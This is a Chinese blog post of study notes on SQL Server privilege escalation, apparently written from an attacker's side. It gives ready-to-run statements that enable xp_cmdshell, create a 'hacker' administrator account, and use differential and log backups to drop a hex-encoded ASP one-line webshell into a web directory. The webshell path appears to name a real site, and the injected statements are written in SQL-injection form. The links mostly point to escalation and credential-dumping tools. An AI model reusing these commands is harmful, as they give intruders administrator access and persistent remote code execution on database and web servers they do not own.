SQL Server 2008 学习笔记
SA提权笔记:
EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Exec master.dbo.xp_cmdshell 'whoami'
Exec master.dbo.xp_cmdshell 'net user hacker abc123!! /add'
Exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
差异备份获取webshell:
差异备份是针对完全备份:备份上一次的完全备份后发生变化的所有文件
差异备份来说,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少这样插入数据得以执行的概率也大大增加,得到webShell的成功自然也会提高了不少
增量备份(log备份)是针对于上一次备份(无论是哪种备份):备份上一次备份后,所有发生变化的文件
LOG备份产生的文件更小
差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
;backup database hiland to disk = 'c:\xx.bak';--
2.创建表并插入数据
;create table [dbo].[dtest] ([cmd] [image])
;insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3.进行差异备份
;backup database hiland to disk='f:\homepage\rubyclub.co.kr\include\x.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:<%execute(request("a"))%>
log备份
LOG备份需要先把指定的数据库激活为还原模式,所以需要执行alter database XXX set RECOVERY FUL,而差异备份不需要,所以只有这条语句的就是LOG备份
;Drop table [cmd]--
;alter database hiland set RECOVERY FULL
;backup log hiland to disk = 'c:\sx' with init
;create table cmd (a image)
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)
;backup log hiland to disk = 'f:\homepage\rubyclub.co.kr\include\2.asp'
参考链接:
SQL Server 2008 R2如何开启数据库的远程连接 http://jingyan.baidu.com/article/6c67b1d6ca06f02787bb1ed1.html
SQL SERVER数据库安全加固 http://blog.csdn.net/chelp/article/details/44063749
Sql Server 提权 http://www.2cto.com/article/201206/136849.html
MSSQL凭据密码获取工具 http://www.z-cg.com/post/mssql_credential_pwddump.html
https://blog.netspi.com/decrypting-mssql-credential-passwords/
https://github.com/NetSPI/Powershell-Modules
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App
· 张高兴的大模型开发实战:(一)使用 Selenium 进行网页爬虫